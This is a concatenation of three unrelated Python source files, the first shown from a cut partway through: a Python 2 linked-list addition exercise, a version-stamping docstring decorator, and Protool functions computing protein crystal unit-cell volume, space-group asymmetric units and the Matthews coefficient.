        addNodeInFront(result, sumandcarry[1])
    return result
# Helper function for recursive adding lists
def addListsFwd2Helper(p1, p2):
    """Recursive helper: add equal-length node chains most-significant-first.

    Returns a two-element list [sum_head_node, carry]; both inputs must be
    the same length (guaranteed by the padding in addLists_fwd_2).
    NOTE: Python 2 code -- "carry = val/10" relies on integer division.
    """
    if (p1 == None) and (p2 == None):
        sumandcarry = [None,0] # a python list stores sum node and carry
        return sumandcarry
    sumandcarry = addListsFwd2Helper(p1.next, p2.next)
    val = p1.value + p2.value + sumandcarry[1]
    dig_node = insertBefore(sumandcarry[0], val%10)
    carry = val/10
    return [dig_node, carry]
# Helper function to insert node in the front of a linked list
def addNodeInFront(linkedlist, value):
    """Prepend a new Node holding value to linkedlist (in place)."""
    node = Node(value)
    node.next = linkedlist.head
    linkedlist.head = node
# Helper function to insert node before a node
def insertBefore(node, value):
    """Return a new Node holding value whose next pointer is node."""
    new_node = Node(value)
    new_node.next = node
    return new_node
# Helper function to create a reversed linedlist
def reverseLinkedlist(linkedlist):
    """Return a NEW LinkedList with the nodes of linkedlist in reverse order.

    The input list is not modified; each value is re-wrapped in a fresh node
    prepended to the new list.
    """
    current = linkedlist.head
    newlinkedlist = LinkedList()
    while current != None:
        addNodeInFront(newlinkedlist, current.value)
        current = current.next
    return newlinkedlist
# Helper function to caculate length of a linked list
def lengthOfLinkedlist(linkedlist):
    """Count the nodes in linkedlist by walking it once from the head."""
    node = linkedlist.head
    count = 0
    while node != None:
        count = count + 1
        node = node.next
    return count
# Helper funtion to pad the list with zeros in front
def padInFront(linkedlist, number):
    """Return a new LinkedList equal to linkedlist with number leading zeros.

    NOTE(review): the new list SHARES its tail nodes with the input list
    (padlist.head = linkedlist.head) -- mutation of one affects the other.
    """
    padlist = LinkedList()
    padlist.head = linkedlist.head
    for i in range(number):
        addNodeInFront(padlist, 0)
    return padlist
#----------------test--------------
# Ad-hoc smoke test (Python 2 print statements); runs on import.
# randomLinkedList comes from the wildcard import of classes.LinkedList.
L1 = randomLinkedList(3,0,9)
L2 = randomLinkedList(5,0,9)
print L1
print L2
print "In reverse order, the sum is: "
print addLists_rev(L1, L2)
print "In forward order with iterative implementation, the sum is: "
print addLists_fwd(L1, L2)
print 'In forward order with recursive implementation, the sum is: '
print addLists_fwd_2(L1, L2)
|
"""
A module including custom decorators.
"""
from . import __version__
def add_version(f):
    """
    Add the version of the tool to the help heading.

    :param f: function to decorate
    :return: decorated function
    """
    # Guard against functions without a docstring: f.__doc__ is None there,
    # and the original "str + None" concatenation raised a TypeError.
    doc = f.__doc__ or ""
    f.__doc__ = "Version: " + __version__ + "\n\n" + doc
    return f
|
#
# # Protool - Python class for manipulating protein structuress
# Copyright (C) 2010 Jens Erik Nielsen
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Contact information:
# Email: Jens.Nielsen_at_gmail.com
def calculate_mass(PI):
    """Calculate the mass of all protein atoms in a Protool instance.

    Sums the per-residue molecular weights ('Mw') for amino-acid residues
    only. NOTE(review): the final -16.0 appears to be a terminal-group
    correction -- confirm against the Protool attribute tables.
    """
    weight=0.0
    for residue in PI.residues:
        if PI.isaa(residue):
            weight=weight+PI.all_attribute[PI.three_to_one[PI.resname(residue)]]['Mw']
    return weight-16.0
def calculate_unit_cell_volume(PI):
    """Calculate the volume of the unit cell (in A^3).

    Reads cell lengths a, b, c and angles alpha, beta, gamma from the first
    CRYST1 record in PI.cryst and applies the general (triclinic) cell
    volume formula, which reduces to a*b*c for orthogonal cells.
    """
    # Import only the names actually used (was "from math import *").
    from math import sqrt, cos, radians
    cr=PI.cryst[0].split()
    a=float(cr[1])
    b=float(cr[2])
    c=float(cr[3])
    alpha=radians(float(cr[4]))
    beta=radians(float(cr[5]))
    gamma=radians(float(cr[6]))
    Vuc= a*b*c*sqrt(1.0-pow(cos(alpha),2)-pow(cos(beta),2)-pow(cos(gamma),2)+2.0*cos(alpha)*cos(beta)*cos(gamma))
    return Vuc
# Number of asymmetric units (Z) per space group, keyed by the space-group
# symbol as it appears in PDB CRYST1 records (mixed spacing conventions).
SGdata={'P 42cm': 8, 'P 6(3)/mmc': 24, 'I4(1)/amd': 32, 'P 4 3 2': 24, 'P 42/mcm': 16, 'I4/mcm': 32, 'P-42(1)m': 8, 'Pn-3': 24, 'P4/nnc': 16, 'P-3c1': 12, 'Abm2': 8, 'P 21': 2, 'P-42(1)c': 8, 'P4/mbm': 16, 'P4/ncc': 16, 'P 41 21 2': 8, 'P3(1)12': 6, 'Pmc2(1)': 4, 'I-42d': 16, 'I4(1)22': 16, 'Cmm2': 8, 'I-42m': 16, 'P6(5)22': 12, 'R32': 18, 'C222(1)': 8, 'R-3c': 36, 'P321': 6, 'R-3': 18, 'R3': 9, 'P-6c2': 12, 'I 4 3 2': 48, 'R-3m': 36, 'Pbcn': 8, 'Pbcm': 8, 'Pbca': 8, 'R3m': 18, 'P6/mcc': 24, 'Pmn2(1)': 4, 'Cmma': 16, 'Cmmm': 16, 'P6(3)22': 12, 'R3c': 18, 'Iba2': 8, 'Pm-3m': 48, 'F432': 96, 'Ia-3': 48, 'Ama2': 8, 'P 43 2 2': 8, 'P 21 3': 12, 'F222': 16, 'P 4 21 2': 8, 'P3(2)21': 6, 'P 4/n': 8, 'Pmmn': 8, 'Pmmm': 8, 'Imma': 16, 'Pmma': 8, 'P 21/c': 4, 'P 2/m': 4, 'I4(1)/acd': 32, 'P6mm': 12, 'I-4': 8, 'P3m1': 6, 'P 2/c': 4, 'P 21/m': 4, 'Pccn': 8, 'I2(1)3': 24, 'Pccm': 8, 'P-4c2': 8, 'Pnn2': 4, 'Pcca': 8, 'Pbam': 8, 'P 41 2 2': 8, 'Pban': 8, 'P 42 /ncm': 16, 'P-3m1': 12, 'P4(2)mc': 8, 'P 62 2 2': 12, 'P 41': 4, 'Ibca': 16, 'P 2': 2, 'P3': 3, 'P 1': 1, 'P6': 6, 'P4(3)32': 24, 'P 4': 4, 'P 42 /mbc': 16, 'P4(2)/m': 8, 'P4(2)/n': 8, 'Pmna': 8, 'P4(2)bc': 8, 'P-4b2': 8, 'Pmm2': 4, 'Fd-3': 96, 'Imm2': 8, 'P3(2)': 3, 'P6(3)': 6, 'P-6': 6, 'P4/mcc': 16, 'P 41 32': 24, 'P6(1)': 6, 'I-43d': 48, 'Pba2': 4, 'Pnnm': 8, 'P 42': 4, 'Pcc2': 4, 'Pnna': 8, 'P6(1)22': 12, 'P 43 21 2': 8, 'C2/c': 8, 'P-62c': 12, 'Pnma': 8, 'P4/m': 8, 'P6/mmm': 24, 'Amm2': 8, 'P3c1': 6, 'P 21 21 21': 4, 'Fmm2': 16, 'I 2 3': 24, 'P-6m2': 12, 'P4/nbm': 16, 'I4/mmm': 32, 'F4(1)32': 96, 'Fm-3m': 192, 'Immm': 16, 'P3(1)': 3, 'P4/mmm': 16, 'P4(2)/nmc': 16, 'P4cc': 8, 'Pa-3': 24, 'P6(3)cm': 12, 'Aba2': 8, 'P 43': 4, 'Fddd': 32, 'P6cc': 12, 'I4(1)': 8, 'Ibam': 16, 'C2': 4, 'P-4m2': 8, 'I-43m': 48, 'I422': 16, 'Pca2(1)': 4, 'P3(2)12': 6, 'P 42 32': 24, 'I2(1)2(1)2(1)': 8, 'I4(1)cd': 16, 'I4/m': 16, 'P6(2)': 6, 'P 2 3': 12, 'Fmmm': 32, 'F-43c': 96, 'P6/m': 12, 'P-43n': 24, 'P6(4)22': 12, 'P4bm': 8, 'Fdd2': 16, 
'Cm': 4, 'Pc': 2, 'Cc': 4, 'I222': 8, 'F23': 48, 'P-31c': 12, 'P31c': 6, 'I-4m2': 16, 'P3(1)21': 6, 'P-31m': 12, 'P4nc': 8, 'I4mm': 16, 'I4(1)32': 48, 'I4(1)/a': 16, 'P4/mnc': 16, 'I-4c2': 16, 'P622': 12, 'Pna2(1)': 4, 'Im-3': 48, 'P6(3)/mcm': 24, 'P 42 21 2': 8, 'P312': 6, 'P6(4)': 6, 'F4-3m': 96, 'Pn-3n': 48, 'Pn-3m': 48, 'P 2 2 21': 4, 'I4': 8, 'Ccca': 16, 'C2/m': 8, 'P-42c': 8, 'P-42m': 8, 'Pm': 2, 'Cccm': 16, 'C222': 8, 'P31m': 6, 'P4/nmm': 16, 'Cmcm': 16, 'Pnnn': 8, 'Fm-3': 96, 'Cmca': 16, 'P4mm': 8, 'P422': 8, 'P 42 nm': 8, 'P4(2)/nbc': 16, 'Pma2': 4, 'P6(3)/m': 12, 'P6(3)mc': 12, 'P-62m': 12, 'Pnc2': 4, 'P-4': 4, 'Ccc2': 8, 'P-4n2': 8, 'I4cm': 16, 'Cmc2(1)': 8, 'P-1': 2, 'P-43m': 24, 'P-3': 6, 'P 2 2 2': 4, 'P 42/mnm': 16, 'P 65': 6, 'Pm-3': 24, 'P 42 2 2': 8, 'P 21 21 2': 4, 'P 42/nnm': 16, 'I4(1)md': 16, 'Pm-3n': 48, 'P 42/mmc': 16, 'Ima2': 8}
def get_asym_units(PI):
    """Return the number of asymmetric units (Z) for the structure's
    space group, trying an exact SGdata lookup first, then progressively
    truncated symbol prefixes, and finally falling back to 1.

    NOTE: Python 2 code (print statements, dict.has_key).
    """
    SG=PI.spacegroup
    print 'Looking for spacegroup: %s' %SG
    if SGdata.has_key(SG):
        print 'Found!'
        return SGdata[SG]
    # No exact match, then we search for the closest match
    for cut in range(len(SG),3,-1):
        nSG=SG[:cut]
        if SGdata.has_key(nSG):
            print 'Found %s' %nSG
            return SGdata[nSG]
    print 'Spacegroup not found: %s' %SG
    return 1
def calculate_Vm(PI):
    """Calculate Vm, Protein volume, Solvent volume and crystal density.

    Returns the tuple (Vm, protein volume %, solvent volume %, crystal
    density in g/mL, unit-cell volume in A^3, total protein mass in the cell).
    """
    # Mass
    Mw=calculate_mass(PI)
    # Number of assymmetric units in unit cell
    z=get_asym_units(PI)
    # Unit cell volume
    Vuc=calculate_unit_cell_volume(PI)
    # Calculate Vm (the Matthews coefficient, A^3 per Dalton)
    Vm=Vuc/(Mw*z)
    # Calculate protein volume as a percentage of the cell volume
    Na=6.02E23  # Avogadro's number
    densprot=1.35E-24 # g / A**3
    protein_vol=100.0*Mw*z/(densprot*Na)/Vuc
    solvent_vol=100.0-protein_vol
    # Weighted average of protein density and water (1.00 g/mL)
    cryst_dens=(protein_vol*densprot*1E24+(100.0-protein_vol)*1.00)/100.0
    return Vm,protein_vol,solvent_vol,cryst_dens,Vuc,Mw*z
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.